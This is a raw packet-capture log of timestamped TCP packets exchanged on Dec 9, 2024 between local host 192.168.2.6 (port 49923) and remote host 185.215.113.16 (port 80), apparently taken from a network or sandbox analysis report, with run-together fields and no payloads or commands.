                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.849720001 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.850841045 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.851008892 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.851054907 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.852041960 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.852085114 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.852216005 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.852260113 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.853315115 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.853466034 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.853512049 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.854607105 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.854651928 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.854990005 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.855032921 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.855954885 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.855998993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.856372118 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.856417894 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.857243061 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.857286930 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.857409954 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.857458115 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.858550072 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.858592987 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.858890057 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.859831095 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.859878063 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.860295057 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.860337019 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.861083031 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.861126900 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.861479044 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.861521006 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.862425089 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.862983942 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.863028049 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.863723993 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.863796949 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.863842010 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.863908052 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.865039110 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.865220070 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.865292072 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.866292953 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.866367102 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.866831064 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.866902113 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.867566109 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.867635965 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.867955923 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.868025064 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.869030952 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.869118929 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.869177103 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.869246006 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.870161057 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.870232105 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.870417118 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.870490074 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.871458054 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.871767044 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.871833086 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.872740984 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.872816086 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.872845888 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.872916937 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.874088049 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.874524117 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.874598980 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.875294924 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.875366926 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.875510931 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.875583887 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.876646996 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.876715899 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.971085072 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.971354961 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.971498966 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.971662998 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.971748114 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.971807957 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.971879005 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.973035097 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.973294973 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.973354101 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.974364996 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.974404097 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.974484921 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.974529982 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.975522041 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.975560904 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.975650072 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.975688934 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.976816893 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.976855993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.976939917 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.976979017 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.978095055 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.978137016 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.978452921 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.978492975 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.997503042 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.997838020 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.997916937 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.997952938 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.997965097 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.998013020 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.999032974 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.999085903 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.999222040 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.999270916 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.000143051 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.000191927 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.000279903 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.000324011 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.001226902 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.001276970 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.001354933 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.001400948 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.002413034 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.002459049 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.002811909 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.002855062 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.003532887 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.003823042 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.003895044 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.004543066 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.004632950 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.004892111 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.004965067 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.005640984 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.005713940 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.006051064 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.006788015 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.006858110 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.007167101 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.007241011 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.007886887 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.007966042 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.008018970 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.008089066 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.009021044 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.009179115 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.009254932 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.010096073 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.010166883 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.010622025 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.010691881 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.011240959 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.011316061 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.011403084 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.011470079 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.012432098 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.012499094 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.013046980 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.013169050 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.013499022 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.013566971 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.013940096 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.014014006 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.014805079 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.014893055 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.015117884 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.015198946 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.015723944 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.015816927 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.015937090 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.015993118 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.016730070 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.016804934 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.016927004 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.016997099 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.018073082 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.018304110 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.018378019 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.019033909 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.019109011 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.019406080 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.019480944 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.020073891 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.020143986 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.020467997 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.020536900 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.021183014 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.021367073 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.021440983 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.022365093 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.022439957 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.022780895 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.022850990 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.023411989 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.023480892 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.023680925 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.023744106 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.024507999 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.024575949 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.024777889 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.024844885 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.025574923 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.025641918 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.025971889 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.026035070 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.026663065 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.026729107 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.026760101 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.026823997 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.027810097 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.027988911 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.028060913 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.028915882 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.029227972 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.029233932 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.029294968 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.030085087 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.030227900 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.030334949 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.030529022 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.031155109 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.031245947 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.031300068 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.031368017 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.032284021 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.032371998 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.032382965 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.032438993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.033371925 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.033513069 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.033597946 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.034425974 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.034492970 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.034507990 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.034586906 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.035682917 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.035764933 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.035834074 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.035896063 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.036664009 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.036727905 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.037066936 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.037130117 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.037750006 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.037812948 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.038131952 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.038196087 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.038860083 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.039048910 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.039115906 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.040124893 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.040189981 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.040225029 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.040291071 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.041147947 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.041210890 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.041280985 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.041342974 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.042196989 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.042584896 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.042649031 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.043371916 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.043436050 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.043591022 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.043661118 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.044456959 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.044492006 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.044503927 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.044528961 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.045520067 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.045715094 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.045756102 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.046624899 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.046664953 CET4992380192.168.2.6185.215.113.16
